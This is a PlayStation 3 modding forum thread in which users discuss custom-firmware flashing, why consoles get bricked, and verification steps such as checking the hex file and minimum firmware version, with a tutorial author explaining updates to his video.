Correct me if i am wrong mate @Joonie, but doesn't the HAN Exploit use the same Flash_4.84.hex as the CFWs? I am trying to remember as i HAN exploited one on my 4000 Slims, but that was a couple of weeks ago, but i forgot if the Flash.hex was applicable to the HAN Exploit.

flash_484.hex is only for those downgrable units which can't be used on 3K and 4K slims including your model.

The reason why this part can be extremely dangerous is that the flasher itself doesn't stop flashing 3K/4K models which is why we warn people and have them validate their minimum version before proceeding any further, and even after flashing, in case of situation like @shab, verification step was recommended before rebooting so he would have saved his console from bricking that was caused by corrupted hex file that he downloaded.

So, a couple of things could have saved his PS3, such as

1. Verification of hex file (which was suggested in the flash writer post).
2. Verification of patched dump before rebooting PS3 (which was suggested in the flash writer post).

Minver can be obtained from within the browser using webkit exploit IIRC, if that's the case we can just grab minver and disable all buttons on the page if it's too high. Maybe the developers have done something like this in v4, since I know they added more checks to prevent this kinda thing from happening.

Here is a script that tells you your minimum firmware version, I know the devs can do this themselves but I just wanted to show how easy it could be to prevent bricks, this could be added to a web server and guides could be updated to say visit this site first, just an idea until v4 releases

Yeah I know it will only solve the problem of people trying to flash 3ks/4ks, but still it is one less problem. I don't understand how so many people brick using these tools tbh, I mean how can the hex file get corrupted that many times? Is there some other issue involved?

Hey all! I've lurked here for a while, so seems like a good time to finally register on here. Joonie pinged me privately about this, so I thought I would chime in. He asked if I could update my tutorial, unfortunately due to YouTube being.... Well, YouTube, I cannot add in any extra video footage to the video itself. The most I can do with the current video would be to add in extra information to the description, as well as a comment which I can pin so that's the first thing people see when looking at the comment section. I whipped up the extra steps as steps to take to mitigate any brick risks, had it double-checked by Joonie and esc0rtd3w, and have updated the video.

Despite the amount of comments I get, I still go in and at minimum read through the comments I get. From my observations since the video has gone up: an overwhelming majority of users who have completed the steps have successfully flashed CFW onto their consoles. It has been a small minority of users who have reported bricks in the comments, and a majority of those users with bricked consoles have verified that they missed or ignored steps in the tutorial. As an example: I spent a few minutes harping on which models do and do not work, as well as the importance of verifying your minimum version must be 3.56 or lower. That is explained on the pages linked, in the description, and in the video. If someone deviates and decides to continue on with their Super Slim for example, they chose to ignore all the warnings.

Not covering a few of the steps brought up here? My mistake. Again, I've added the required information I could, and I can tell you all I'll do better next time around. I personally did use the tools myself several times, across several different consoles prior to making this video. I had no issues with them outside of the weird forced recovery mode I detailed in my video, we seem to have deduced that to that PS3 being a CECHL model with a busted BD drive. I do what I can independently to make sure the methods I detail can work several times over for me, if I run into little GOTCHA! or brick issues, I look into minimizing that before releasing a video.

However, I'm also of the belief that you run the risk of bricking a device while performing any sort of hardware or software modification. I've seen it several times with a process I can go through 100 times with no issues, but once it's out in the wild people will report issues or failures they run into. It's happened to me personally with my own hardware! A friend of mine had well over 100 PS3s downgraded and installed with CFW, so I set him up with my first Slim. Somehow, that was the one console he touched which got busted in the process. We even arranged to try it out on a second console, and somehow that was the first compatible console he ran into which no matter what wouldn't take CFW. I didn't place any blame on him for that, was a bit disappointed, but I wrote it off as a fluke.

The most I can do to prevent these situations is to provide steps to mitigate them, which I certainly could have done more on for this tutorial. Again, my mistake, and I'll do better next time.

Here is a script that tells you your minimum firmware version, I know the devs can do this themselves but I just wanted to show how easy it could be to prevent bricks, this could be added to a web server and guides could be updated to say visit this site first, just an idea until v4 releases

I mean I know you guys were adding more rigorous checks into v4, this was just an idea until it actually releases. Admittedly, not a lot of people are stupid enough to try and flash 3k/4k consoles, but there are also those cases where the original shell has been replaced.

I think in this case this Mario guy meant well, I've seen some of his videos and they are good, but maybe a lack of knowledge about the flashing process showed here. Or he just forgot.
